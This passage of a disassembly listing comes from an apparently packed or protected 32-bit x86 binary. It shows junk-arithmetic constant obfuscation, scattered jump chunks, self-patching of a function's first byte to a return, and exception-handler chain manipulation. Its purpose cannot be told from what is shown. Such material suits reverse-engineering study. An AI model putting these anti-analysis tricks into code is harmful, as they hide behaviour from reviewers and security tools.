loc_4565FA:				; CODE XREF: sub_44CA9C+Fj
		jmp	loc_441839
; END OF FUNCTION CHUNK	FOR sub_44CA9C
; ---------------------------------------------------------------------------
		or	esi, 6F235071h
		add	esi, 0F397E031h
		jmp	loc_443198
; ---------------------------------------------------------------------------

loc_456610:				; CODE XREF: hvvrg7ie:0043DEB0j
		xor	ebp, 0FB54C772h
		test	edx, eax
		jmp	loc_442668
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_45661D:				; CODE XREF: sub_44D2F8-2DDCj
		pop	esi
		or	eax, 3F9B4F39h
		and	eax, 0B0DCBA43h
		or	eax, 9DCA5C3Ah
		xor	eax, 4C4869F8h
		add	eax, ebp
		add	eax, 0E6945CEh
		jmp	loc_44EB84
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_456643:				; CODE XREF: sub_43D531+1880Dj
		jnz	loc_457BA7
		jmp	loc_43917C
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD0B

loc_45664E:				; CODE XREF: sub_43CD0B+57C3j
		jnz	loc_43DFCE
		push	edi
		xchg	edi, ebx
		jmp	loc_43DFC3
; END OF FUNCTION CHUNK	FOR sub_43CD0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F4D

loc_45665C:				; CODE XREF: sub_443F4D:loc_43EF39j
		add	edx, 5907E6C6h
		xor	edx, 54519D11h
		add	edx, 4158CF1h
		xchg	edx, [esp+4+var_4]
		jmp	loc_43CC50
; END OF FUNCTION CHUNK	FOR sub_443F4D

; =============== S U B	R O U T	I N E =======================================



sub_456676	proc near		; DATA XREF: hvvrg7ie:0044BA95o
		xchg	edx, [esp+0]
		shr	eax, 18h
		jmp	loc_440A7E
sub_456676	endp

; ---------------------------------------------------------------------------
		popf
		jmp	loc_45B584
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_329. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_456688:				; CODE XREF: sub_43E063+8BCDj
		jmp	loc_44E957
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F2A

loc_45668D:				; CODE XREF: sub_445F2A-1793j
		popf
		or	ecx, esi
		not	edi

loc_456692:				; CODE XREF: sub_445F2A:loc_43E2D8j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43FC0D
		jmp	loc_4456D1
; END OF FUNCTION CHUNK	FOR sub_445F2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442301

loc_4566A3:				; CODE XREF: sub_442301:loc_43F8CDj
		jmp	ds:dword_41D188
; END OF FUNCTION CHUNK	FOR sub_442301
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_486. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		or	byte ptr [eax-52h], 0FFh
		inc	dword ptr [edi-2874DBC4h]
		pop	edi
		mov	eax, [esp]
		push	offset sub_445D53
		jmp	loc_43C953
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_4566C2:				; CODE XREF: sub_43C811+112E2j
		test	edx, 20000000h
		jmp	loc_44B8C4
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_4566CD:				; CODE XREF: sub_44BFF5-4AC1j
		sub	eax, 0CECBA01h
		and	eax, 61E9F4FDh
		xor	eax, 1B70F46Dh
		add	eax, ebp
		add	eax, 0C44EBCEDh
		jmp	loc_447C23
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4566EC:				; CODE XREF: sub_43F227+Ej
		jz	loc_453FCA
		jmp	loc_447D27
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
		cmp	ecx, eax
		jmp	loc_452989
; ---------------------------------------------------------------------------
		cmp	ds:dword_4578C0, 0
		jnz	loc_45779E
		jmp	loc_444B61
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_456710:				; CODE XREF: sub_44E533-14939j
		or	edi, edx
		jge	loc_454D17
		push	eax
		jmp	loc_448B89
; END OF FUNCTION CHUNK	FOR sub_44E533
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_45671E:				; CODE XREF: sub_44398A-3446j
		sub	al, 99h

loc_456720:				; CODE XREF: sub_445934:loc_45ABB6j
		mov	edx, [ebp-4]
		jmp	loc_458CDC
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E6A5

loc_456728:				; CODE XREF: sub_44E6A5:loc_459F23j
		mov	ebp, esp
		push	ecx
		mov	[ebp-4], eax
		push	7E37050h
		pop	eax
		or	eax, 0FB0E6021h
		xor	eax, 0D41A1358h
		add	eax, 0DDF2C45Ah
		jmp	loc_45145E
; END OF FUNCTION CHUNK	FOR sub_44E6A5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_402. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468C2

loc_45674C:				; CODE XREF: sub_4468C2+7F1Dj
		jmp	loc_43E22B
; END OF FUNCTION CHUNK	FOR sub_4468C2
; ---------------------------------------------------------------------------

loc_456751:				; DATA XREF: sub_45A26A-13D8Eo
		xor	eax, eax
; START	OF FUNCTION CHUNK FOR sub_43A7B5

loc_456753:				; CODE XREF: sub_43A7B5+1C6CDj
		pop	large dword ptr	fs:0

loc_45675A:				; CODE XREF: hvvrg7ie:loc_44BFE9j
		add	esp, 4
		retn
; END OF FUNCTION CHUNK	FOR sub_43A7B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AFD7

loc_45675E:				; CODE XREF: sub_44AFD7+Aj
					; hvvrg7ie:loc_44D49Ej
		jmp	loc_4513E6
; END OF FUNCTION CHUNK	FOR sub_44AFD7

; =============== S U B	R O U T	I N E =======================================



sub_456763	proc near		; CODE XREF: sub_45A26Ap

; FUNCTION CHUNK AT 004411E3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00444465 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004471B8 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045522A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459AA7 SIZE 00000026 BYTES

		push	large dword ptr	fs:0
		call	sub_43A7B5

loc_45676F:				; CODE XREF: sub_454D37+53A9j
		jmp	loc_459AA7
sub_456763	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_456774:				; CODE XREF: sub_43E063:loc_45B82Ej
					; sub_43E063:loc_45B994j
		call	nullsub_9
		retn
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4591C3

loc_45677A:				; CODE XREF: sub_4591C3-E1CAj
		jmp	loc_441FA4
; END OF FUNCTION CHUNK	FOR sub_4591C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45202B

loc_45677F:				; CODE XREF: sub_45202B-E7EAj
		jmp	sub_43E7F3
; END OF FUNCTION CHUNK	FOR sub_45202B

; =============== S U B	R O U T	I N E =======================================



sub_456784	proc near		; CODE XREF: sub_43E063:loc_456838j

; FUNCTION CHUNK AT 004411DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453A96 SIZE 00000008 BYTES

		push	ebx
		push	84A0CDE6h
		pop	ebx
		sub	ebx, 7E0267B6h
		add	ebx, 0F9A6D46Eh
		jmp	loc_453A96
sub_456784	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_226. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A97

loc_45679D:				; CODE XREF: sub_457A97-116C0j
		jmp	sub_43E7F3
; END OF FUNCTION CHUNK	FOR sub_457A97

; =============== S U B	R O U T	I N E =======================================



sub_4567A2	proc near		; CODE XREF: hvvrg7ie:00445106j
					; sub_44EB20+8p
		xchg	ecx, [esp+0]
		pop	ecx
		pop	edx
		lea	eax, sub_4475EC
		mov	byte ptr [eax],	0C3h
		jmp	sub_4475EC
sub_4567A2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4475EC

loc_4567B5:				; CODE XREF: sub_4475EC+1j
		push	offset sub_43B547
		jmp	loc_43CDCC
; END OF FUNCTION CHUNK	FOR sub_4475EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450E01

loc_4567BF:				; CODE XREF: sub_450E01:loc_44FA48j
		rol	esi, 1
		or	esi, 0FA4AC557h
		add	esi, 0DF578A8Eh
		and	esi, 27AEE987h
		add	esi, 0FDF97E7Dh
		call	sub_4541D4

loc_4567DE:				; CODE XREF: hvvrg7ie:00458886j
		jmp	loc_442629
; END OF FUNCTION CHUNK	FOR sub_450E01
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4484B9

loc_4567E3:				; CODE XREF: sub_4484B9+93FFj
		jmp	loc_44F6DC
; END OF FUNCTION CHUNK	FOR sub_4484B9
; ---------------------------------------------------------------------------

loc_4567E8:				; CODE XREF: hvvrg7ie:0043B1ABj
		jmp	locret_440704
; ---------------------------------------------------------------------------

loc_4567ED:				; DATA XREF: hvvrg7ie:0044507Co
		cmp	dword ptr [ebp-8], 0
		jz	loc_454364
		jmp	loc_44FF2D
; ---------------------------------------------------------------------------

loc_4567FC:				; CODE XREF: hvvrg7ie:loc_4421FEj
		jz	loc_454F0C
		jmp	loc_43C0F7
; ---------------------------------------------------------------------------

loc_456807:				; CODE XREF: hvvrg7ie:00455CF5j
		jno	loc_43910D
		mov	ebp, esi
		cmp	eax, esi
		jmp	loc_449BAB
; ---------------------------------------------------------------------------
		mov	eax, 0EA3AEDBCh
		call	sub_44059F
		mov	ds:off_41D048, eax
		lea	eax, loc_45987E
		jmp	loc_447C7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_456831:				; CODE XREF: sub_44191F+97C9j
		pop	edx
		jmp	loc_43B4CB
; END OF FUNCTION CHUNK	FOR sub_44191F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_529. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_456838:				; CODE XREF: sub_446284:loc_439626j
					; sub_43F907:loc_43C94Ej ...
		jnb	sub_456784
		call	sub_439549
		test	al, al
		jz	loc_448F5E
		jmp	loc_45B82E
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------
		push	edi
		push	0B67E9659h
		pop	edi
		rol	edi, 0Eh
		test	edi, 10h
		jmp	loc_439177
; ---------------------------------------------------------------------------
		push	ebx
		mov	ecx, eax
		jmp	sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_45686D:				; CODE XREF: sub_440643:loc_44BAB0j
		sub	esi, 4EF5EFD1h
		rol	esi, 0Ah
		test	esi, 100h
		jmp	loc_4529D0
; END OF FUNCTION CHUNK	FOR sub_440643

; =============== S U B	R O U T	I N E =======================================



sub_456881	proc near		; DATA XREF: sub_45190C-9DF8o

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043B59E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043B965 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043D69E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044199C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00448D91 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044B650 SIZE 00000007 BYTES

		push	edx
		push	ebx
		push	4B44F081h
		pop	ebx
		sub	ebx, 0E0A858E3h
		jnz	loc_44199C

loc_456895:				; CODE XREF: hvvrg7ie:00442E86j
		jmp	loc_44B650
sub_456881	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458D28

loc_45689A:				; CODE XREF: sub_458D28:loc_44FD9Dj
		mov	eax, ecx
		xchg	eax, [esp+0]
		push	edi
		push	1EDD3E22h
		pop	edi
		jmp	loc_439F75
; END OF FUNCTION CHUNK	FOR sub_458D28
; ---------------------------------------------------------------------------

loc_4568AB:				; CODE XREF: hvvrg7ie:loc_4564D2j
		call	sub_446A16
		call	sub_44DE0A
		mov	edx, 92B16BD7h
		push	edi
		push	0B218D848h
		pop	edi
		xor	edi, 0BF89E39h
		jmp	loc_43DA99
; ---------------------------------------------------------------------------

loc_4568CC:				; CODE XREF: hvvrg7ie:00456D8Ej
		pop	ecx
		mov	eax, [esp]
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp]
		call	sub_4585EE
		mov	eax, 1F1D4A60h
		call	sub_450C5A
		jmp	loc_440BCD
; ---------------------------------------------------------------------------

loc_4568EA:				; DATA XREF: sub_458D36-1B1B6o
		pop	edi
		mov	eax, [ebp-4]
		call	sub_447842
; START	OF FUNCTION CHUNK FOR sub_43AFB6

loc_4568F3:				; CODE XREF: sub_43AFB6:loc_43AFD4j
		jnz	loc_44EBC5
		jmp	loc_441F7B
; END OF FUNCTION CHUNK	FOR sub_43AFB6
; ---------------------------------------------------------------------------

loc_4568FE:				; CODE XREF: hvvrg7ie:00442EF9j
		jle	loc_43B18A

; =============== S U B	R O U T	I N E =======================================



sub_456904	proc near		; CODE XREF: sub_45AEC9+1p
		xchg	eax, [esp+0]
		pop	eax
		push	6DD54355h
		pop	esi
		add	esi, 8C0AF989h

loc_456914:				; CODE XREF: sub_448100:loc_4496CEj
		rol	esi, 5
		sub	esi, 0C390D157h
		jmp	loc_454001
sub_456904	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_456922:				; CODE XREF: hvvrg7ie:0044C694j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_456923:				; CODE XREF: sub_442FD1+19EEj
		jmp	loc_43C82D
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------

loc_456928:				; CODE XREF: hvvrg7ie:00441742j
		jmp	loc_43E5A8
; ---------------------------------------------------------------------------
		xor	edx, 47DEEDA3h

loc_456933:				; CODE XREF: hvvrg7ie:loc_455759j
		jmp	sub_450FF2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_515. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_456939:				; CODE XREF: sub_456A52-16A8Cj
		jz	loc_44520A
		jmp	loc_447F73
; END OF FUNCTION CHUNK	FOR sub_456A52

; =============== S U B	R O U T	I N E =======================================



sub_456944	proc near		; DATA XREF: sub_43E128:loc_444B43o

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043B430 SIZE 0000000F BYTES

		mov	eax, [ebp-18h]
		add	eax, 0CE71FA42h
		add	eax, 318E05E2h
		mov	eax, [eax]
		add	eax, [ebp-4]
		xor	edx, edx

loc_45695A:				; CODE XREF: sub_43E163+1370Aj
		push	edx
		push	ebx
		jmp	loc_43B430
sub_456944	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_192. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_456962:				; DATA XREF: sub_44CB64-EF6Do
		sub	al, 99h
		push	offset sub_448077
		jmp	loc_443F85
; ---------------------------------------------------------------------------

loc_45696E:				; CODE XREF: hvvrg7ie:0045840Cj
		jnb	locret_441BE5
		test	edi, 1906C311h
		jmp	loc_442D35

; =============== S U B	R O U T	I N E =======================================



sub_45697F	proc near		; CODE XREF: hvvrg7ie:loc_44B785j
					; hvvrg7ie:00452E59p
		xchg	edx, [esp+0]
		pop	edx
		imul	byte ptr [edx]
		push	offset sub_442F6B
		jmp	nullsub_482
sub_45697F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_45698F:				; CODE XREF: sub_43F227:loc_457F8Bj
		mov	edi, ebx
		xchg	edi, [esp+0]
		pop	edx
		xor	edx, ebx
		or	eax, 0F4B15291h
		push	ebx
		jmp	loc_43E845
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_4569A3:				; CODE XREF: sub_44191F:loc_44358Cj
		jge	loc_457D2A
		and	ecx, ebx

loc_4569AB:				; CODE XREF: hvvrg7ie:00446C1Dj
		rol	edi, 17h
		ja	loc_43EA3A
		adc	ebx, esi
		push	0F1E2F624h
		jmp	loc_457D2A
; END OF FUNCTION CHUNK	FOR sub_44191F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_381. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_4569C1:				; CODE XREF: sub_445CCD+15003j
		jmp	loc_43F38E
; END OF FUNCTION CHUNK	FOR sub_445CCD

; =============== S U B	R O U T	I N E =======================================



sub_4569C6	proc near		; DATA XREF: hvvrg7ie:004499BCo

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043A0FE SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043C6D2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D928 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004403C6 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 004426BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446536 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044BB24 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044D628 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044E21D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044E78C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452C11 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004552AA SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00459F9A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045AB8C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045B197 SIZE 00000005 BYTES

		jz	loc_4552AA
		sub	al, 99h
		push	0F2BD1E96h
		pop	edx
		sub	edx, 5BADF6A4h
		and	edx, 12CB7171h
		jns	loc_44E21D
sub_4569C6	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43EEA9

loc_4569E6:				; CODE XREF: sub_43EEA9:loc_45B503j
		mov	eax, ecx
		xchg	eax, [esp+8+var_8]
		push	offset sub_45AA75
		jmp	loc_442F0B
; END OF FUNCTION CHUNK	FOR sub_43EEA9

; =============== S U B	R O U T	I N E =======================================



sub_4569F5	proc near		; CODE XREF: sub_442846+3p
					; hvvrg7ie:0045A4F9j

; FUNCTION CHUNK AT 0043B759 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CA20 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044FCA4 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	esi
		mov	esi, ecx
		jmp	loc_43B759
sub_4569F5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AD9

loc_456A01:				; CODE XREF: sub_440AD9+29C9j
		jz	loc_43DC6A

loc_456A07:				; CODE XREF: hvvrg7ie:0044F81Dj
		jmp	sub_452A79
; END OF FUNCTION CHUNK	FOR sub_440AD9
; ---------------------------------------------------------------------------
		xor	esi, edx
		ror	edi, 9

loc_456A11:				; CODE XREF: hvvrg7ie:loc_44E2BAj
		pushf
		jmp	loc_43DC63
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ACF1

loc_456A17:				; CODE XREF: sub_45ACF1:loc_44D347j
		not	esi
		sbb	eax, 0CD44525Dh
		jmp	loc_448F4E
; END OF FUNCTION CHUNK	FOR sub_45ACF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D574

loc_456A24:				; CODE XREF: sub_43D574:loc_4442D6j
		call	sub_4525FC
		mov	eax, 8CA83E2Ch
		call	sub_44059F
		push	edx
		push	1A41E6F1h
		pop	edx
		sub	edx, 5B9AF98h
		add	edx, 0EBB998E3h
		jmp	loc_43BDE6
; END OF FUNCTION CHUNK	FOR sub_43D574
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445934

loc_456A4B:				; CODE XREF: sub_445934:loc_44A04Cj
		push	eax
		call	sub_43E7F3
		retn
; END OF FUNCTION CHUNK	FOR sub_445934

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_456A52	proc near		; CODE XREF: sub_43D285-116Dj
					; hvvrg7ie:004588C5p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 0043B5F7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D166 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D1CC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EAC1 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043FFB3 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044295E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044520A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00445424 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00445B57 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446199 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004463DD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00447F51 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00447F73 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00448009 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00448CF8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044913E SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004491DC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004493CA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044B0AE SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044BAC0 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044C9A5 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00452318 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00455802 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00456939 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004570F8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457392 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004585E1 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045B678 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		jmp	loc_445424
sub_456A52	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D0B7

loc_456A5B:				; CODE XREF: sub_43D0B7:loc_43D0C6j
		add	ecx, 7266B91Eh
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_44760B
; END OF FUNCTION CHUNK	FOR sub_43D0B7
; ---------------------------------------------------------------------------

loc_456A69:				; CODE XREF: hvvrg7ie:00456ECFj
		test	edi, edx
		jmp	loc_44AABB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447162

loc_456A70:				; CODE XREF: sub_447162+Bj
		rol	edx, 0Dh
		or	edx, 9C3DDE71h
		and	edx, 13ADDC11h
		rol	edx, 1
		xor	edx, 1ADE23B2h
		add	edx, ebp
		jmp	loc_451245
; END OF FUNCTION CHUNK	FOR sub_447162
; ---------------------------------------------------------------------------

loc_456A8E:				; CODE XREF: hvvrg7ie:0044594Dj
		shl	ebp, 9
		jmp	loc_454D14
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D247

loc_456A96:				; CODE XREF: sub_43D247:loc_44661Bj
		jz	loc_4459C3
		jmp	loc_44B898
; END OF FUNCTION CHUNK	FOR sub_43D247
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448881

loc_456AA1:				; CODE XREF: sub_448881+1j
		js	loc_4587B7
		mov	eax, [esp-8+arg_4]
		push	edx
		push	offset sub_451F65
		jmp	loc_43D906
; END OF FUNCTION CHUNK	FOR sub_448881
; ---------------------------------------------------------------------------
		mov	ds:off_41D044, eax
		lea	eax, sub_440C05
		mov	byte ptr [eax],	0C3h
		jmp	loc_44FAAF

; =============== S U B	R O U T	I N E =======================================



sub_456AC9	proc near		; CODE XREF: sub_40207A+110p
					; hvvrg7ie:00459869j
					; DATA XREF: ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044FCA9 SIZE 00000008 BYTES

		push	eax
		push	0D600E19h

loc_456ACF:				; CODE XREF: sub_44B1C6:loc_4471DDj
		pop	eax
		sub	eax, 5A11648Ah
		add	eax, 4CF6EEDAh
		jmp	loc_44FCA9
sub_456AC9	endp

; ---------------------------------------------------------------------------
		jl	loc_44A72D
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_456AE7:				; CODE XREF: sub_43C0DE+DA4j
		add	eax, ebx
		jmp	sub_44CC1E
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44957E

loc_456AEE:				; CODE XREF: sub_44957E:loc_450AB3j
		jl	loc_44D866
; END OF FUNCTION CHUNK	FOR sub_44957E
; START	OF FUNCTION CHUNK FOR sub_451C8E

loc_456AF4:				; CODE XREF: sub_451C8E+7j
		jmp	loc_4485A7
; END OF FUNCTION CHUNK	FOR sub_451C8E
; ---------------------------------------------------------------------------
		adc	ecx, 0C0DF6C50h
		jmp	loc_44D85B
; ---------------------------------------------------------------------------

loc_456B04:				; CODE XREF: hvvrg7ie:0044F292j
		cmp	al, 0A4h
		jz	loc_447D03
		jmp	loc_4393CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C8FB

loc_456B11:				; CODE XREF: sub_44C8FB+B98j
		add	ebx, 4D95955Fh
		and	ecx, 0C7E525BEh

loc_456B1D:				; CODE XREF: sub_44C8FB:loc_43F657j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44BB24
		jmp	loc_457FAE
; END OF FUNCTION CHUNK	FOR sub_44C8FB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6D7

loc_456B2E:				; CODE XREF: sub_44C6D7:loc_44AA51j
		not	eax
		sbb	ebp, 0FEBF178Eh
		mov	eax, edi
		jmp	loc_459DE2
; END OF FUNCTION CHUNK	FOR sub_44C6D7
; ---------------------------------------------------------------------------

loc_456B3D:				; CODE XREF: hvvrg7ie:004462F4j
		jge	loc_43CA3C
; START	OF FUNCTION CHUNK FOR sub_44C072

loc_456B43:				; CODE XREF: sub_44C072-87C2j
		jmp	loc_43C400
; END OF FUNCTION CHUNK	FOR sub_44C072
; ---------------------------------------------------------------------------
		pop	ebp
		pushf
		rol	ebp, 1Fh
		ror	ebp, 12h
		jmp	loc_43CA3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EE1C

loc_456B55:				; CODE XREF: sub_43EE1C+12j
		mov	eax, [eax]
		push	eax
		call	sub_456B75
; END OF FUNCTION CHUNK	FOR sub_43EE1C
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_456B5D:				; CODE XREF: sub_4465A6-A8A9j
					; hvvrg7ie:0044013Cj ...
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_45541B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E56

loc_456B61:				; CODE XREF: sub_443E56+1555Aj
		jmp	nullsub_362
; END OF FUNCTION CHUNK	FOR sub_443E56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44808A

loc_456B66:				; CODE XREF: sub_44808A+11275j
		jmp	loc_445123
; END OF FUNCTION CHUNK	FOR sub_44808A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D47E

loc_456B6B:				; CODE XREF: sub_43D47E-A76j
		jmp	loc_43F7CD
; END OF FUNCTION CHUNK	FOR sub_43D47E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_456B70:				; CODE XREF: sub_450F97-15F10j
		jmp	loc_448428
; END OF FUNCTION CHUNK	FOR sub_450F97

; =============== S U B	R O U T	I N E =======================================



sub_456B75	proc near		; CODE XREF: sub_43EE1C+17D3Cp
		push	ebp
		call	sub_44B595
sub_456B75	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44646D

loc_456B7B:				; CODE XREF: sub_44646D-2F87j
		jmp	loc_4547C3
; END OF FUNCTION CHUNK	FOR sub_44646D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A2D1

loc_456B80:				; CODE XREF: sub_44A2D1-9056j
		jmp	loc_44E61C
; END OF FUNCTION CHUNK	FOR sub_44A2D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443452

loc_456B85:				; CODE XREF: sub_443452:loc_453323j
		pop	esi
		or	esi, 361CBF86h
